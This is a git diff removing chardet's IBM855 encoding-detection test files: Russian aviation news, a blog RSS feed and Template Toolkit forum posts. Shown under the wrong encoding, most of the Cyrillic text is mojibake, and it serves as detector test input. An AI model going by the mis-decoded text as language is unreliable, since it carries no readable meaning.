ֶ קוײׂח כב¨ׂ¨װ· חי¨ װ  ום ״בײ¦ כ ום B787 - Dreamliner. £ײבם¢  ·¦¨ו · ״ײ װ ·¢ײ׀¨¨ כׂ¨דו·ו¨׀םװסׂ ד ׂײ׀¨ו ׂ - A380 · Boeing 777-200LR Worldliner. ¨בכס½ כ 2005 ¬ײ¦ח ״בײץ¨׀ ·ד״סו ו¨׀םװס¨ ״ײ׀¨וס · ד ׂײדוײו¨׀םװײ ״ב·׀¨ו¨׀ כ §ח¢ ½. לוײבײ½ 10 װײ¢ב חדו װײכ·׀ ב¨ֶײב¦ ״ײ ¦ ׀םװײדו· ״ײ׀¨ו  ״ דד י·בדֶײ¬ײ ד ׂײ׀¨ו  ¢¨ף ¦ײף ״ב כֶ·, ״¨ב¨׀¨ו¨כ ·ף ­ײװֶײװ¬  כ ׁײװ¦ײװ. ל גײדד··  כ· ֶײׂ״ װ·· ״ײֶ  װ¨ ב¨ץ וד װ  כס¢ײב ׂ¨י¦ח ¬·¬ װו ׂ· ׂ·בײכײ¬ײ  כ· דובײ·ו¨׀םדוכ . ײ ¦ װװסׂ, ״ײכ·כץ·ׂד כ ֶײװ₪¨ ¦¨ֶ ¢ב, "¡קבײ×׀ײו" ¢׀·י¨ ֶ כס¢ײבח Boeing 787, װ¨י¨׀· A350.§בח¬·ׂ ףװ ·ׂסׂ ¦׀ ײוב ד׀· דײ¢סו·¨ׂ דו ׀ײ וײ, וײ כ װ  ׀¨ ¦¨ֶ ¢ב ¢ס׀ ״ײ¦״·ד װ ״¨בכס½ ֶבח״װס½ ֶײװוב ֶו װ  RRJ - בײדד·½דֶ·½ ב¨¬·ײװ ׀םװס½ ד ׂײ׀¨ו, ב ףב ¢ וסכ ¨ׂס½ ¡¶ַ "החµײ½" · ״ײ׀ח·כץ·½ ״ײ¦¦¨ביֶח ¬ײדח¦ בדוכ . "¡קבײ×׀ײו" דײ¬׀ ד·׀ד ֶח״·ום 30 ¢׀·יװ¨ׂ ¬·דוב ׀םװסµ ד ׂײ׀¨וײכ ״בײ·ףכײ¦דוכ  "החµײ¬ײ" ¨ב¨ף «·װ װדײכח ׀·ף·װ¬ײכח ֶײׂ״ װ·. ב כ¦ , · ף¦¨דם ײ¢ײץ׀ײדם װ¨ ¢¨ף דֶ װ¦ ׀ : ¦¨״חו ו ­ײד¦חׂס ¡׀¨ֶד װ¦ב ׁ¨¢¨¦¨כ, ֶײװובײ׀·בחש·½ ײֶײ׀ײ 30%  ֶ₪·½ "¡קבײ×׀ײו " ¨ב¨ף ױ ₪·ײװ ׀םװח ב¨ף¨בכװח ֶײב״ײב ₪·, ״ײײ¢¨ש ׀ כד¨ׂ· כײףׂײיװסׂ· ד״ײדײ¢ ׂ· ף ¢׀ײֶ·בײכ ום ד¦¨׀ֶח כ ·װו¨ב¨ד µ ¦בח¬ײ¬ײ ¢׀·יװ¨ׂ ¬·דוב ׀םװײ¬ײ ד ׂײ׀¨ו  - ¡װ-148 ײו "¡װוײװײכ ".רוײו י¨ ד ׂײ׀¨ו ״ײװב כ·׀ד · בחֶײכײ¦·ו¨׀ ¦בח¬ײ½ בײדד·½דֶײ½  כ· ֶײׂ״ װ·· - "ַב דר½ב". ז ׂ ״ײד·ו ׀·, וײ חי¨ ״ײדובײ¨װװס½ ד ׂײ׀¨ו ׀חץ¨ װ¨״ײדובײ¨װװײ¬ײ, · ״ב¨¦״ײ׀· ֶח״·ום ¦¨דום ¡װ-148 · ״ײֶ  כײף¦¨בי וםד ײו RRJ. ױײ ¬ײדח¦ בדוכײ דװײ ¦ ׀ײ ״ײװום, ֶ ֶײ¬ײ ·ף ״ב¨ו¨װ¦¨װוײכ ײװײ ״ײ¦¦¨בי·כ ¨ו. ל ֶײװ₪¨ ¦¨ֶ ¢ב ·דוײװ·ֶ· כ גײד·ׂחש¨דוכ¨, ײדװײכװײׂ  ֶ₪·ײװ¨ב¨ "ַב דר½ב", ¦ ׀· ״ײװום, וײ ר¦¨ב ׀םװײ¨  ¬¨װודוכײ ף ¢׀ײֶ·בח¨ו ד¦¨׀ֶח. - - - - - ױײכײד·¢·בדֶײ¨  כ· דובײ¨װ·¨: דײכב¨ׂ¨װװ  גײדד· · ¨¨ װ¨¢¨דװס½ ף ש·וװ·ֶ בײ¦·׀·דם ״ײ¦ ײ¦װײ½ ףכ¨ף¦ײ½ - http://www.aviaport.ru/news/2005/12/29/99256.html - ל ¦¨ֶ ¢ב¨ 1993 ¬. ״¨בכס½ ״ײ׀¨ו דײכ¨בץ·׀ ×בײװוײכײ½ ¢ײׂ¢ ב¦·בײכש·ֶ ¨וכ¨בוײ¬ײ ״ײֶײ׀¨װ· הח-34. ׳¢ קוײׂ · ¦בח¬·µ דײ¢סו·µ ב דדֶ ףסכ ¨ו ¬¨װ¦·ב¨ֶוײב ױ¡׳ ·ׂ. ל.. ֶ ׀ײכ  ¡. £ײ¢בסץ¨כ - Thu, 29 Dec 2005 16:27:00 +0300 - ל ¦ ׀¨ֶײׂ ¦¨ֶ ¢ב¨ 1993 ¬ײ¦  דײכ״ ׀· ¦כ  דײ¢סו·: װ  ״ײ׀·ו·¨דֶײ½ ֶ בו¨ ׂ·ב  ״ײכ·׀ דם װײכ  דחכ¨ב¨װװ  דוב װ  ״ײ¦ װ ףכ װ·¨ׂ גײדד·,   כװחוב· ¨¨, כ דוײ׀·₪¨ ה·¢·ב·, ד ׀¨וװײ¬ײ ״ײ׀ ף כײ¦  ·ׂ. ל.. ֶ ׀ײכ  כףׂס׀ כ ״¨בכס½ דכײ½ ״ײ׀¨ו וײ׀םֶײ וײ דײ¢ב װװס½ ×בײװוײכײ½ ¢ײׂ¢ ב¦·בײכש·ֶ ¨וכ¨בוײ¬ײ ״ײֶײ׀¨װ· הח-34. ­ײדח¦ בדוכײ · ײ¦·װ ·ף ד ׂסµ ¬בײףװסµ ף  כד ·דוײב· כײ¨װװײ½  כ· ₪·· ד ׂײ׀¨וײכ בײ¦·׀·דם ײ¦װײכב¨ׂ¨װװײ, ״ײ¦ ײ¦װײ½ ףכ¨ף¦ײ½. ַ ֶ ¢ח¦וײ £ײ¬ ¢׀ ¬ײד׀ײכ·׀ גײדד·, ¦ בײכ כ כ ׂײׂ¨װו ¨¨ בײי¦¨װ· װ¨¢¨דװײ¬ײ ף ש·וװ·ֶ , ֶײוײבס½ ¢ח¦¨ו ב ףכ·כ וםד · ב דו· כׂ¨דו¨ דײ דוב װײ½.׳¢ קוײׂ · ײ ¦בח¬·µ ףװ ׂ¨װ ו¨׀םװסµ דײ¢סו·µ בײדד·½דֶײ½ ·דוײב·· ב דדֶ ףסכ ¨ו ·µ װ¨״ײדב¨¦דוכ¨װװס½ ח דוװ·ֶ, ¬¨װ¨ב ׀םװס½ ¦·ב¨ֶוײב ױײכײד·¢·בדֶײ¬ײ  כ· דובײ·ו¨׀םװײ¬ײ ״בײ·ףכײ¦דוכ¨װװײ¬ײ ײ¢¨¦·װ¨װ· ·ׂ. ל.. ֶ ׀ײכ  ¡׀¨ֶד װ¦ב £ײ¢בסץ¨כ.- ­׀ כװסׂ דײ¢סו·¨ׂ ¦׀ ב ¢ײוװ·ֶײכ ױ¡׳ ·ׂ. ל.. ֶ ׀ײכ  כ חµײ¦ש¨ׂ ¬ײ¦ח דו ׀ײ ¦ײ׀¬ײי¦ װװײ¨ כֶ׀¨װ·¨ װ ץ¨¬ײ װײכײ¬ײ ד ׂײ׀¨ו  הח-34 כ ¬ײדח¦ בדוכ¨װװס½ ף ֶ ף. רוײ ףװ ·ו, וײ, װ ·װ  ד װײכײ¬ײ 2006 ¬ײ¦ , ף כײ¦ דװײכ  ¢ח¦¨ו ״בײ·ףכײ¦·ום ד¨ב·½װח ¢ײ¨כח ו¨µװ·ֶח. ב·¨ׂ ײ¢¨ׂס ״בײ·ףכײ¦דוכ  ¬ײ¦ ײו ¬ײ¦  ¢ח¦חו ב דו·.׃ס 12 ׀¨ו ״ב·¢׀·י ׀· קוײו ¦¨װם, ״ײד׀¨¦ײכ ו¨׀םװײ "דװײד·כ" װ  ׀¨וװסµ ·ד״סו ו¨׀םװסµ ״ײ׀¨ו µ כײד¨ׂם ײ״סוװסµ ײ¢ב ף₪ײכ הח-34. ג ¢ײוס ״ײ דײכ¨בץ¨װדוכײכ װ· ד ׂײ׀¨ו  װ¨ ײדו װ כ׀·כ ׀·דם ¦ י¨ כ ד ׂס¨ ד׀ײיװס¨ ¦׀ ף כײ¦  כב¨ׂ¨װ , ֶײ¬¦  כד¨ ״בײ·ףכײ¦דוכײ ף ׂ·ב ׀ײ · װ¨ ¢ס׀ײ דב¨¦דוכ װ· װ  ף ב״׀ וח, װ· װ  ק׀¨ֶובײקװ¨ב¬·. ױ¨ וײ׀םֶײ קֶײװײׂ·¨דֶ·¨ װ¨כף¬ײ¦ס וב¨¢ײכ ׀· ײו ֶײ׀׀¨ֶו·כ  ױ¡׳ ·ׂ. ל. . ֶ ׀ײכ  ׂײ¢·׀·ף ₪·· כד¨µ ד·׀ - כ בחֶײכײ¦דוכ¨ דוב װס װ¨ ¢ס׀ײ ¨¦·װײ¬ײ ׂװ¨װ· ײ דח¦ם¢¨ קוײ¬ײ ״בײ¨ֶו . לײ כדֶײׂ ד׀ח ¨, ¦ײ ֶײװ₪  90-µ װ·ֶוײ װ¨ ׂײ¬ דֶ ף ום ײ״ב¨¦¨׀¨װװײ, וײ הח-34 ¢ח¦¨ו כֶ׀¨װ כ ״׀ װס ״¨ב¨כײײבחי¨װ· ללה, · װ ׂ ײדו כ ׀ײדם וײ׀םֶײ ײ¦װײ: כ¨ב·ום כ װ ץ¨ ¦¨ו·ש¨.׃ס ח״ײבװײ ״בײ¦ײ׀י ׀· ב ¢ײו ום · ״ײ¢¨¦·׀·. 13  כ¬חדו  2005 ¬ײ¦  ׂ·װ·דוב ײ¢ײבײװס ״ב·װ׀ ב¨ץ¨װ·¨ כֶ׀·ום הח-34 כ ¬ײדח¦ בדוכ¨װװס½ ף ֶ ף, ו¨ׂ ד ׂסׂ ״ײ¦כ¨¦ ·וײ¬ײכח ¨בוח ״ײ¦ ב¨ףח׀םו ו ׂ· כד¨µ ·ד״סו װ·½ - · ׂ ץ·װס, · ׀¦¨½ \ No newline at end of file diff --git a/chardet/tests/IBM855/blog.mlmaster.com.xml b/chardet/tests/IBM855/blog.mlmaster.com.xml deleted file mode 100644 index c7dfaba..0000000 --- a/chardet/tests/IBM855/blog.mlmaster.com.xml +++ /dev/null @@ -1,170 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ה ױ­! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - ײ¦¬ײוײכֶ  ֶ ¢·׀¨ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - - ױ ץ· ׂ·׀ס¨ ף ¬ב װ·װס¨ ¦בחףם - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ה׀ כ¨װ, װחיװ  דכףם. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - ¡ ֶײׂח רדו·כ ׀¨½ - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - ױ·ץוֶ - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - ¡׀·ד  - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - ל¨׀ײׂ ב ×ײװ - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - ַײ׀¨ד  - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/IBM855/forum.template-toolkit.ru.1.xml b/chardet/tests/IBM855/forum.template-toolkit.ru.1.xml deleted file mode 100644 index bc3adbb..0000000 --- a/chardet/tests/IBM855/forum.template-toolkit.ru.1.xml +++ /dev/null @@ -1,428 +0,0 @@ - - - - - «ײבחׂס Template Toolkit : ג ¢ײו  ד Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-1.html?rss - Template Toolkit - ¢סדוב , ׂײשװ  · ב דץ·ב¨ׂ  ד·דו¨ׂ  ײ¢ב ¢ײוֶ· ץ ¢׀ײװײכ. ױ  ד ½ו¨ ב ¢ײו ¨ו ×ײבחׂ, כ ֶײוײבײׂ ײ¢דחי¦ וד כײ״בײדס ·ד״ײ׀םףײכ װ· ¢·¢׀·ײו¨ֶ· ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ·. פװ ֶײׂדוכײ ד Template Toolkit. לײףׂײיװײדו· ¢·¢׀·ײו¨ֶ·, ״ב·¨ׂס ·ד״ײ׀םףײכ װ·. בײ¢׀¨ׂס · ·µ ב¨ץ¨װ·¨. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 12 Dec 2005 10:09:35 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ץ ¢׀ײװס כ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - Wed, 7 Dec 2005 11:19:46 GMT - Template::Plugin::XML::RSS - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - ״ב· ·ד״ײ׀םףײכ װ·· Template::Plugin::XML::RSS כ¨דם כסכײ¦ ·ף ¦כ·יֶ  Template דב ףח װ ·װ ¨ו ¦¨׀ וםד כ UTF-8.  ¢דײ׀וװײ כ¨דם. זחו ×ײבחׂ כבײ¦¨ ֶ ֶ כ RSS ¦ װװס¨ ב װ·ו · ֶײ¦·בײכֶ  koi-8-r ב ¢ײו ¨ו.<br /> -״ב· קוײׂ כד¨ ״ײ״סוֶ· ״¨ב¨¦ ום כ ֶײװדובֶחוײב XML::RSS-&gt;new (encode =&gt; 'ׂײ_ֶײ¦·בײכֶ ') ::RSS-&gt;new ( output =&gt; 'ׂײ_ֶײ¦·בײכֶ ') װ¨ ״בײֶ וסכ ¨ו :-(<br /> -·ףח¨װ·¨ ב¨ףח׀םו ו  ״ב· DEBUG_ALL װ· ֶ ¨ׂח װ¨ ״ב·כ¨׀·. כ וב דד·בײכֶ¨ ¦¨¢ ¬  כד¨ ¦ װװס¨ ·¦חו כ װחיװײ½ ׂװ¨ ֶײ¦·בײכֶ¨. .ו.¨. ¢¨ף ״¨ב¨ֶײ¦·בײכ װ·· ¦כ·יֶײׂ TT2<br /> -<br /> -ׂײי¨ו ¬¦¨-וײ קוײו ״׀ ¬·װ ״¨ב¨ֶבסכ ¨ו TT2-ץװס½ $output ?<br /> -<br /> -כײו ו ֶ  ֶײװדובחֶ₪·:<br /> -[% USE news = XML.RSS('forum_1.xml') %]<br /> -[% FOREACH item = news.items %]<br /> -&lt;pre&gt;<br /> - [% item.title %]<br /> -&lt;/pre&gt;<br /> -[% END %] - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-120.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - Thu, 1 Dec 2005 09:33:45 GMT - §כ  include-ֶ ו ׀ײ¬  - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - ט ׂ¨װ ו ֶ  ד·וח ₪·. ­בח״״  ד ½וײכ (ץוחֶ 10) ·ׂ¨ו ״ײו· ײ¦·װ ֶײכײ¨ ײ×ײבׂ׀¨װ·¨. ה ½וס ד¦¨׀ װס װ  TT2. ה¨½ ד ח ֶ י¦ײ¬ײ ד ½ו  דכײ½ templates ֶ ו ׀ײ¬.<br /> -ױײ ׂװײ¬·¨ × ½׀ס ײ¦·װ ֶײכס (װ¨ כד¨).<br /> -רוײ װ¨ ײ¨װם ח¦ײ¢װײ, ײ¢װײכ׀ום כ 10 ׂ¨דו µ.<br /> -<br /> -ַ ֶ ד¦¨׀ ום ¦כ  include ֶ ו ׀ײ¬  ח TT וײ¢ס ײװ ·דֶ ׀ דװ  ׀  כ ײ¦װײׂ ֶ ו ׀ײ¬¨(װ ״ב·ׂ¨ב ײ¢ש¨ׂ template),   ¨ד׀· װ¨ װ ץ¨׀ - כ ¦בח¬ײׂ (¦׀ ֶ י¦ײ¬ײ ¨ש¨ · חװ·ֶ ׀םװס½ ֶ ו ׀ײ¬ template)? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-118.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - Thu, 17 Nov 2005 05:29:38 GMT - template Factory - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - סו דם ב¨ ׀·ףײכ ום װ¨וײ  װ ׀ײ¬·װײ¨ ץ ¢׀ײװח Factory (ײ¦·װ ¬׀ כװ½ ץ ¢׀ײװ, · ׂװײ¬ײ ץ ¢׀ײװײכ ״בײ¦חֶוײכ),<br /> -הײײוכ¨ודוכ¨װװײ ״ב· װ ״·ד װ·· ץ ¢׀ײװײכ-״בײ¦חֶוײכ × ¢ב·ֶ· µײו¨׀ײדם ¢ס ײוד׀¨י·כ ום ·µ ד״¨₪·×·ֶ ₪·. ֶ ֶ ׂ·װ·ׂחׂ װ ׀··¨ ײ״ב¨¦¨׀¨װװסµ ¢׀ײֶײכ BLOCK...END · ײ״¨ב¨¦¨׀¨װװסµ ״¨ב¨ׂ¨װװסµ. <br /> -ז.¨. ״¨ב¨¦ כֶ׀¨װ·¨ׂ ץ ¢׀ײװ  (INCLUDE) ֶ ֶ·ׂ-וײ ײ¢ב ףײׂ &quot;״בײ¬ײװום ¨¬ײ װ  דײײוכ¨ודכ·¨ ד״¨₪·×·ֶ ₪·· × ¢ב·ֶ·&quot;<br /> -ײֶײכסב׀ד כ ֶ׀ דד-ׂײ¦ח׀¨ Template::Context װ ץ¨׀ ו ׂ ״¨ב¨ׂ¨װװח ֶ׀ דד  BLKSTACK, װײ װ·¨¬ײ כװוװײ¬ײ ·ף װ¨„ װ¨ ׂײ¬ח כסו ש·ום, ו·״ :<br /> -foreach my $i ($template-&gt;service-&gt;context()-&gt;BLKSTACK) {<br /> -.....<br /> -} - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-117.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - Sun, 6 Nov 2005 18:33:25 GMT - ַ ֶ ״ײ¦¬בחף·ום ׂײ¦ח׀ם  כוײׂ וײׂ. - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - ¨דום ״בײ¢׀¨ׂ  כ ֶ י¦ײׂ ו¨ׂ״׀¨½ו¨ דײף¦  דכײ½ ״׀ ¬·װ.   µײ¨וד דײף¦ ום ¨¬ײ ״ב· דײף¦ װ·· Template <br /> -<br /> -ד¨½ ד ״בײ״·ד װײ<br /> - PLUGINS=&gt;{<br /> - 'Atma'=&gt;'Atma::TPlugin'<br /> - },<br /> -· כ ֶ י¦ײׂ ו¨ׂ״׀¨½ו¨ ״·ץח <br /> -[% USE Atma(c) %]<br /> -[% Atma.myfunc(&quot;lalala&quot;)%]<br /> -<br /> -<br /> -חףװ ׀ וײ ׂײיװײ ¨¬ײ ״ב·ֶבחו·ום ד ״ײׂײשם <br /> -· װ¨ ״·ד ום USE Atma(c)<br /> -# LOAD_PLUGINS =&gt; Atma::TPlugin-&gt;new($self, $self),<br /> -װײ װ¨״ײװוװס ¨¬ײ ״ ב ׂ¨ובס · וײ-וײ בח¬ ׀ײדם וײ װ¨װ µײ¦·ו ×חװֶ₪· fetch, ״ײ¦¨׀·ו¨דם ײ״סוײׂ ֶ ֶ װחיװײ קוײ ד¦¨׀ ום ? - - Dmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-116.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - Tue, 1 Nov 2005 15:03:41 GMT - ¸ ¨ש„ ֶ ֶײ½ ¦כ·יײֶ ×ײבחׂ  ·ד״ײ׀םףח¨ו¨?? - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - ה ¢י:) - - ה׀¨¦ײ״סו <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-114.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - Tue, 1 Nov 2005 15:02:06 GMT - ׁײֶ ׀·ף ₪· ד ½ו  ד ״ײׂײשם TT - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - ַ ֶ ד¦¨׀ ום ׀ײֶ ׀·ף ₪· ד ½ו  ד ״ײׂײשם TT??<br /> - כסװ¨ד כד¨ ו¨ֶדוײכס¨ דובײֶ· ·ף ץ ¢׀ײװײכ כ ײו¦¨׀םװס¨ × ½׀ס ו·״ <br /> -messages.en<br /> -[% mess1=&quot;English1&quot; %]<br /> -[% mess2=&quot;English2&quot; %]<br /> -<br /> -messages.ru<br /> -[% mess1=&quot;גחדדֶ·½1&quot; %]<br /> -[% mess2=&quot;גחדדֶ·½2&quot; %]<br /> -<br /> -  כ ץ ׀ײװ µ דײײוכ¨ודוכ¨װװײ ״בײ״·ד ׀<br /> -[% IF lang == &quot;en&quot; ][% INCLUDE messages.en %][% END %]<br /> -&lt;html&gt;<br /> -[% mess1 %]<br /> -&lt;/html&gt;<br /> -¦חׂ ׀ ״ײ¦ֶ׀ ום קו· × ½׀ס כ ף כ·ד·ׂײדו· ײו ףסֶ  װײ ו ֶ װ¨ ב ¢ײו ¨ו!! ׃ײי¨ו ֶוײ װ·¢ח¦ם ״ײדײכ¨וח¨ו?<br /> -ד״ ד·¢ײ - - ה׀¨¦ײ״סו <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-113.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - Thu, 27 Oct 2005 11:48:26 GMT - ב¨¦דו כ׀¨װ· - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - ֶוײ-װ·¢ח¦ם ״ײ׀םףח¨ו view? ײ¨װם ח¦ײ¢װ  ץוחֶ , דׂחש ¨ו וײ׀םֶײ וײ ײװ  ״ײֶ  כ &quot;קֶד״¨ב·ׂ¨װו ׀םװײׂ&quot; כ·¦¨. ¸׀· ·ׂ¨¨ו דׂס׀ ״ײ׀םףײכ וםד? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-112.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - Wed, 28 Sep 2005 15:05:48 GMT - Template Toolkit ״ײ winXP - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - §ײ¢בס½ ¦¨װם.<br /> -ײ¦דֶ י·ו¨ ״ײי ׀ח½דו  &#8211; ֶ ֶ חדו װײכ·ום Template Toolkit ״ײ winXP?<br /> -א ·ד״ײ׀םףח ActivePerl 5.8.6. <br /> -לֶ׀  PPM. ¸ װ ץ ¦· ׀ײ¬ ד PPM-ײׂ כס¬׀¦·ו ו ֶ:<br /> -Ppm-&gt; install Template<br /> -Ppm-(ײוכ¨ ¨ו:) &#8211; ו ֶײ¬ײ װׂ !!! <br /> -¸׀·<br /> -Ppm-&gt; install TemplateToolkit<br /> -Ppm-(ײוכ¨ ¨ו:) &#8211; ו ֶײ¬ײ װׂ !!! <br /> -ַ ֶ ׂװ¨ חדו װײכ·ום Template Toolkit ״ײ¦ winXp.<br /> -¡׀¨ֶד¨½ - - Washington <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-110.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - Sun, 25 Sep 2005 11:50:06 GMT - fork() כ [% PERL %] - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - ײ¦דֶ י·ו¨, ״ײי ׀חדו , ֶ ֶ ֶײבב¨ֶוװײ כס״ײ׀װ·ום fork() כ ¢׀ײֶ¨ [% PERL %] TT?<br /> -<br /> -בײדוײ כ״ײ׀װ¨וד ב¨דחבדײ¨ֶׂ  ײ״¨ב ₪·,   ״¨בכײװ  ׀םװס¨ ¦ װװס¨ װ ¦ײ כײףכב ש ום ֶ ֶ ׂײיװײ ¢סדוב¨¨.<br /> -<br /> -ט ׂ¨װ כ ״¨ב¨ׂ¨װװײ½ כ $stash דײ¦¨בי·וםד חֶ ף ו¨׀ם װ  ֶײװװ¨ֶו ֶ £§ · ׂװ¨ ֶ י¨וםד, וײ ד װ·ׂ fork װ¨ דײכד¨ׂ ֶײבב¨ֶוװײ ב ¢ײו ¨ו. ז ֶײ¨ ײשחש¨װ·¨, וײ ״ײ ף כ¨בץ¨װ·· ×ײבֶ  קוײו ֶײװװ¨ֶו ף ֶבסכ ¨וד. - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-109.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - Wed, 21 Sep 2005 11:45:38 GMT - TT ח¦ ׀¨ו װח׀·. - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - ׳¨װם דוב װװס½ ¬׀ֶ, חי¨ ¦ײ׀¬ײ ¢םדם, ב¨ץ¨װ· װ¨ כ·יח.<br /> -¨ב¨¦  כ ץ ¢׀ײװ: <br /> -{params}-&gt;{year}-&gt;'2005';<br /> -כ ץ ¢׀ײװ¨ ״·ץח<br /> -[% params.year %]<br /> -<br /> -· כ·יח 25! ¨ד׀· ״·ץח 1998, כ·יח 1998,   ¨ד׀· ״·ץח 20010007, כ·יח 217!<br /> -<br /> -ֶוײ-װ·¢ח¦ם דו ׀ֶ·כ ׀ד? ֶ ֶ ׀¨·ום? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-108.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - Thu, 15 Sep 2005 12:41:43 GMT - eval() כ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - החש¨דוכח¨ו 